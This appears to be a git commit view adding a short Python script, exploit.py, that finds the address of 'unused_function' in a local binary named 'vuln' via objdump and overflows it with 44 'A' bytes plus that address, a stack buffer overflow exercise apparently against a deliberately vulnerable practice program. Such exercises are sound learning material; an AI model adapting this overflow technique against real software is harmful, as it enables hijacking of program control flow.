diff options
| author | Arslaan Pathan <[email protected]> | 2026-05-20 19:46:27 +1200 |
|---|---|---|
| committer | Arslaan Pathan <[email protected]> | 2026-05-20 19:46:27 +1200 |
| commit | cf00559b398eab50dc04a584ff22339258758364 (patch) | |
| tree | c22130b03dfb77f6ebbf807d9bda3cd43a0ba978 /exploit.py | |
| download | vuln-main.tar.xz vuln-main.zip | |
Diffstat (limited to 'exploit.py')
| -rwxr-xr-x | exploit.py | 14 |
1 files changed, 14 insertions, 0 deletions
diff --git a/exploit.py b/exploit.py new file mode 100755 index 0000000..6ec37e5 --- /dev/null +++ b/exploit.py @@ -0,0 +1,14 @@ +#!/usr/bin/env python3 +import subprocess + +print("locating address of unused_function...") +objdump_output = subprocess.check_output(['objdump', '-d', './vuln'], text=True) +for line in objdump_output.split('\n'): + if '<unused_function>:' in line: + address_hex = line.split()[0] + address_bytes = bytes.fromhex(address_hex)[::-1] + print(f"found address (little endian): {str(address_bytes)}") + break + +payload = b'A' * 44 + address_bytes +subprocess.run(["./vuln", payload]) |